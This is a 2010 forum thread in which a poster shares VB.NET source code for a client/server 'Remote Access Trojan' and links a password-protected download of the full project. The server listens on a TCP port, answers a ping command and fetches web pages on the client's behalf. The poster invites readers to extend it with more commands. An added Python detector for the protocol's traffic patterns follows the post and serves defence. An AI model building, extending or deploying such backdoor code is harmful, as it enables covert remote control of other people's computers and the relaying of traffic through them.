Government Security
Network Security Resources

A Simple Client/server Rat In Vb8


#1 Thiseas

Posted 04 January 2010 - 06:28 AM

According to Webopedia, a RAT is:
Short for Remote Access Trojan, a Trojan horse that provides the intruder, or hacker, with a backdoor into the infected system. This backdoor allows the hacker to snoop your system, use your infected system to launch a zombie (attacks on other systems), or even run malicious code.

I decided to create such a program in VB8 Express Edition, to point out the power of the .NET library. I must say that my program (actually a client/server pair) can be implemented in C# as well. These days (in my opinion) the choice between C# and VB is not a dilemma any more. The underlying framework (.NET 2.0 - 3.5) resolves any difficulties.

About the server:
It listens at a specific port for a client command.
Available commands:
If the first letter of the packet sent by the client is "1" then this is considered a "ping" request. So, the server responds with "I'm here baby!"
If the first letter of the packet sent by the client is "2" then this is considered an HTTP request. So, the server accesses the specified page and sends the web response to the client as an html page.


About the client:
Sends commands and receives responses from the server.
Available commands:
If the first letter of the packet sent by the client is "1" then this is considered a "ping" request
(i.e. the "R u there" checkbox must be checked!). The server should answer with "I'm here baby!"
If the first letter of the packet sent by the client is "2" then this is considered an HTTP request. The server accesses the specified page and sends the web response to the client as an html page. The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.

You can download the full project, from
http://rapidshare.co...0212384/RAT.zip
Password: p0wnbox.com

The program uses .net framework 2.0 and above.

I have tested the server in Windows XP Pro (with .net 2.0), Windows XP Pro (with .net 3.5) and Windows 7 Home Premium. I have tested the client in Windows 7. The Client/Server pair has been tested in a LAN as well as in a virtual machine environment.


You can use this program by any means you like, except for lamer (aka stupid) purposes. A reference to the author of the program, or any other remark or any kind of laudation, is not necessary. This is a tutorial, so the scope is the knowledge and only the knowledge. Our "HowToBeFamous" dept was closed a long time ago...

I strongly suggest you to extend it to handle new commands. It is very easy!

I bet that you gonna use it for educational purposes ONLY.
Am i right?


Thnx... I appreciate!

PS: Any remarks and/or/xor suggestions would be greatly welcome...

The server code:
REM *********************************************************************
 REM  A simple remote access server.
 REM  It listens at a specific port for a client command.
 REM  Available commands:
 REM  1. If the first letter of the packet sent by the client is "1" then this is considered a "ping" request.
 REM     So, the server responds with "I'm here baby!"
 REM  2. If the first letter of the packet sent by the client is "2" then this is considered an HTTP request.
 REM     So, the server accesses the specified page and sends the web response to the client as an html page.
 REM  
 REM  (C) by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
 REM  Greetz to p0wnbox team @ www.p0wnbox.com
 REM 
 REM 
 REM  REMARKS:
 REM  You can get this program and extend it to handle any commands you want.
 REM  I bet that you gonna use it for educational purposes ONLY. Am i right? ;)
 REM  thx... I appreciate!
 REM ****************************************************************************************************************
 Imports System.Net.Sockets
 Imports System.Net
 Imports System.Text
 Imports System.IO

 Class TCPSrv
     Const BUFFER_SIZE As Integer = 512



     Shared Sub Main(ByVal args As String())
         REM  Must listen on correct port- must be same as port client wants to connect on.
         Dim portNumber As Integer = 8000 REM  My default port.
         Dim serverIP As IPAddress = IPAddress.Parse("127.0.0.1") REM  My default IP.
         Dim i As Integer = 0

         REM  If arguments exist then use them, overwriting the defaults.
         While i < args.Length

             Select Case args(i)
                 Case "/p"           REM  Port Flag parameter. If not entered, port 8000 will be used.
                     i += 1          REM  Skip to the actual port parameter.
                     portNumber = Integer.Parse(args(i))
                 Case "/h"           REM  Hosts IP Flag parameter. If not entered, ip 127.0.0.1 will be used.
                     i += 1          REM  Skip to the actual IP parameter.
                     serverIP = IPAddress.Parse(args(i))
             End Select
             i += 1                  REM  Skip to the next argument.
         End While

         Dim tcpListener As New TcpListener(serverIP, portNumber)

         Try

             While (1 = 1)
                 tcpListener.Start()
                 Console.WriteLine("Server is listening on {0}:{1}...", serverIP, portNumber)

                 REM Waiting for a client to be connected. 
                 Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()

                 Console.WriteLine("Connection accepted.")
                 REM  Get the stream
                 Dim networkStream As NetworkStream = tcpClient.GetStream()

                 REM  Read the client command into an 8k buffer. It could not be greater ;)
                 Dim bytes(8000) As Byte
                 networkStream.Read(bytes, 0, 8000)

                 REM  Return the data received from the client to the console.
                 Dim clientdata As String = Encoding.ASCII.GetString(bytes)

                 Dim iPos As Integer = InStr(clientdata, Chr(0))
                 If iPos > 0 Then clientdata = Left(clientdata, iPos - 1)

                 REM According to the packet (its 1st letter) sent by the client we answer
                 If clientdata.Substring(0, 1) = "1" Then     REM Command #1: R u Up request.
                     Dim responseString As String = "I'm here baby!"
                     Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                 ElseIf clientdata.Substring(0, 1) = "2" Then REM Command #2: A web request.
                     REM  I consider the web request command as: "2http://www.google.com",
                     REM  so, I send the command to the "gotoWeb" function w/o its first letter.
                     Dim sTheURL As String = clientdata.Substring(1, clientdata.Length - 1)
                     TCPSrv.gotoWeb(networkStream, sTheURL)
                 Else
                     REM  Unhandled command request found!
                     Dim responseString As String = "Ops... I dont know this command!"
                     Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                 End If

                 tcpClient.Close()
                 tcpListener.Stop()

             End While
         Catch e As Exception
             REM  A serious error occurred. Display its description to the console.
             Console.WriteLine(e.ToString())
         Finally
             tcpListener.Stop()
         End Try
     End Sub

     REM ***************************************************************************************
     REM  This is a very simple function to access a web server (via HTTP), get the server response,
     REM  store this response to a string and send it via TCP to the client.
     REM 
     Shared Sub gotoWeb(ByVal netStream As NetworkStream, ByVal sUrl As String)
         Dim sendBytes As [Byte]()
         Dim sWebHtmlResponse As String

         Try

             REM  Create a WebRequest object with the specified url
             Dim myWebRequest As WebRequest = WebRequest.Create(sUrl)

             REM  Send the WebRequest and wait for response.
             Dim myWebResponse As WebResponse = myWebRequest.GetResponse()

             Dim sPageEncoding As String = DirectCast(myWebResponse, System.Net.HttpWebResponse).CharacterSet

             REM  Call method GetResponseStream to obtain stream associated with the response object
             Dim ReceiveStream As Stream = myWebResponse.GetResponseStream()

             REM  If the operating system has the encoding of the web page then use it, otherwise use the default.
             Dim encode As Encoding
             Try
                 encode = System.Text.Encoding.GetEncoding(sPageEncoding)
             Catch ex As Exception
                 encode = System.Text.Encoding.Default
             End Try

             REM  Pipe the stream to a higher level stream reader with the required encoding format.
             Dim readStream As New StreamReader(ReceiveStream, encode)
             Dim read(256) As Char

             REM  Read 256 characters at a time.
             Dim count As Integer = readStream.Read(read, 0, 256)
             sWebHtmlResponse = ""
             While count > 0
                 REM  Dump the 256 characters on a string .
                 Dim str As New [String](read, 0, count)
                 sWebHtmlResponse += str
                 count = readStream.Read(read, 0, 256)
             End While

             REM  Add a new line (CR+LF) to the webResponse string.
             sWebHtmlResponse += ControlChars.CrLf

             REM  Release the resources of stream object.
             readStream.Close()

             REM  Release the resources of response object.
             myWebResponse.Close()

             REM Send the Html Response to the client in UTF-8 format.    
             sendBytes = Encoding.UTF8.GetBytes(sWebHtmlResponse)
             netStream.Write(sendBytes, 0, sendBytes.Length)


         Catch ex As Exception
             REM Ops! An error occurred, inform the client about it!
             sendBytes = Encoding.ASCII.GetBytes(ex.Message)
             netStream.Write(sendBytes, 0, sendBytes.Length)

         End Try
     End Sub
   
 End Class
..and the more important code fragment from the client:

REM *********************************************************************
REM  A simple client.
 REM  It sends commands at a specific port at a specific address.
 REM  Available commands:
 REM  1. If the first letter of the packet sent by the client is "1" then this is considered a "ping" request
 REM     (i.e. the "R u there" checkbox must be checked!).
 REM     The server should answer with "I'm here baby!"
 REM  2. If the first letter of the packet sent by the client is "2" then this is considered an HTTP request.
 REM     The server accesses the specified page and sends the web response to the client as an html page.
 REM     The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
 REM  
 REM  (C) by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
 REM  Greetz to p0wnbox team @ www.p0wnbox.com
 REM 
 REM 
 REM  REMARKS:
 REM  You can get this program and extend it to handle any commands you want.
 REM  I bet that you gonna use it for educational purposes ONLY. Am i right? ;)
 REM  thx... I appreciate!
 REM ****************************************************************************************************************
 Imports System.Net.Sockets
 Imports System.Text
 Imports System.IO

 Public Class Form1

     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         Dim tcpClient As New System.Net.Sockets.TcpClient()
         Dim sInformation As String

         REM Clear the pages
         RichTextBox1.Clear()
         WebBrowser1.Navigate("about:blank")

         REM  Inform the user about the response time
         sInformation = "Client Requests @ " + DateTime.Now.ToString
         ListBox1.Items.Add(sInformation)

         Try
             tcpClient.Connect(TextBox_IP.Text, NumericUpDown_Port.Value)

             Dim networkStream As Net.Sockets.NetworkStream = tcpClient.GetStream()
             If networkStream.CanWrite And networkStream.CanRead Then
                 Dim sendBytes As [Byte]() = Nothing
                 Dim s As String
                 Dim i As Int32
                 Dim bytes(tcpClient.ReceiveBufferSize) As Byte

                 If CheckBox_handshake.Checked = True Then
                     sendBytes = Encoding.ASCII.GetBytes("1.Is anybody there?")
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                     REM  Read the NetworkStream into a byte buffer.
                     networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                     REM  Output the data received from the host to the listbox.
                     s = Space(5) + Encoding.ASCII.GetString(bytes)
                     ListBox1.Items.Add(s)
                     sInformation = "Server Respond @ " + DateTime.Now.ToString
                     ListBox1.Items.Add(sInformation)

                 Else
                     REM  Send the request to the server.
                     s = "2" + TextBox_URL.Text
                     sendBytes = Encoding.ASCII.GetBytes(s)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)

                     REM  Read the Packet: The HTML page.
                     REM  Loop to receive all the data sent by the server.
                     s = ""
                     i = networkStream.Read(bytes, 0, bytes.Length)
                     While (i <> 0)
                         REM  Translate data bytes to a UTF8 string.
                         s += System.Text.Encoding.UTF8.GetString(bytes, 0, i)
                         i = networkStream.Read(bytes, 0, bytes.Length)
                     End While

                     REM  Inform the user about the response time
                     sInformation = "Server Respond @ " + DateTime.Now.ToString
                     ListBox1.Items.Add(sInformation)


                     REM Update the rich-text box with the HTML response.
                     RichTextBox1.Text = s

                     REM Write the HTML contents to a file and force browser to read it.
                     Using sw As StreamWriter = New StreamWriter("CurrentReadPage.htm", False, System.Text.Encoding.GetEncoding("UTF-8"))
                         sw.Write(s)
                         sw.Close()
                     End Using
                     Dim sCurrentFilePath As String = Environment.CurrentDirectory()
                     sCurrentFilePath += "\CurrentReadPage.htm"
                     WebBrowser1.Navigate(sCurrentFilePath)


                 End If
             Else
                 REM  Report which direction of the stream is unusable, then close the connection.
                 If Not networkStream.CanRead Then
                     ListBox1.Items.Add("Fail to read data from the stream.")
                 ElseIf Not networkStream.CanWrite Then
                     ListBox1.Items.Add("Fail to write data to the stream.")
                 End If
                 tcpClient.Close()
             End If
         Catch ex As Exception
             ListBox1.Items.Add(ex.Message)
         End Try


     End Sub
 End Class

 
when you 've got a hammer everything starts to look like a nail...
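
Seen from the monitoring side, the one-byte command protocol in the post above leaves fixed byte patterns in each TCP flow. The following Python sketch is an added example, not part of the original post or project: it classifies reassembled flows using the command prefixes and reply strings from the posted code. The `(direction, payload)` flow format, the function name and the sample flows are assumptions constructed for illustration.

```python
import re

# Byte patterns taken from the server/client code posted above.
PING_REPLY_TAIL = b"m here baby!"   # tail of the reply to command "1"
UNKNOWN_REPLY = b"Ops... I dont know this command!"
FETCH_CMD = re.compile(rb"^2([a-z][a-z0-9+.\-]*://\S+)", re.IGNORECASE)


def classify_flow(messages):
    """Return findings for one TCP flow.

    messages: list of (direction, payload) tuples in capture order,
    direction being "c2s" (client to server) or "s2c" (assumed format).
    """
    findings = []
    last_cmd = None
    for direction, payload in messages:
        # The posted server cuts the command at the first NUL byte.
        payload = payload.split(b"\x00", 1)[0]
        if not payload:
            continue
        if direction == "c2s":
            last_cmd = payload[:1]
            match = FETCH_CMD.match(payload)
            if match:
                url = match.group(1).decode("ascii", "replace")
                findings.append(("fetch_command", url))
        elif last_cmd == b"1" and payload.endswith(PING_REPLY_TAIL):
            findings.append(("ping_handshake", None))
        elif payload == UNKNOWN_REPLY:
            findings.append(("unknown_command_reply", None))
    return findings


# Constructed sample flows (not real captures).
SAMPLE_FLOWS = {
    "ping": [("c2s", b"1.Is anybody there?"), ("s2c", b"I'm here baby!")],
    "fetch": [("c2s", b"2http://www.example.com/\x00\x00"),
              ("s2c", b"<html>...</html>\r\n")],
    "probe": [("c2s", b"9"), ("s2c", UNKNOWN_REPLY)],
    "benign": [("c2s", b"GET / HTTP/1.1\r\n\r\n"),
               ("s2c", b"HTTP/1.1 200 OK\r\n")],
    "empty": [("c2s", b""), ("s2c", b"")],
}

if __name__ == "__main__":
    for name, flow in SAMPLE_FLOWS.items():
        print(name, classify_flow(flow))
```

The ping reply is matched on its tail and only after a "1" command in the same flow, which keeps ordinary HTTP traffic on the same port from matching.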

#2 cozyhomer

Posted 12 February 2010 - 08:21 AM

Hi, can you please give me the full rapidshare download link

#3 Thiseas

Posted 20 February 2010 - 03:30 AM

Hi, can you please give me the full rapidshare download link


You can download the VB 8 full project, from here: http://rapidshare.co...0212384/RAT.zip
when you 've got a hammer everything starts to look like a nail...




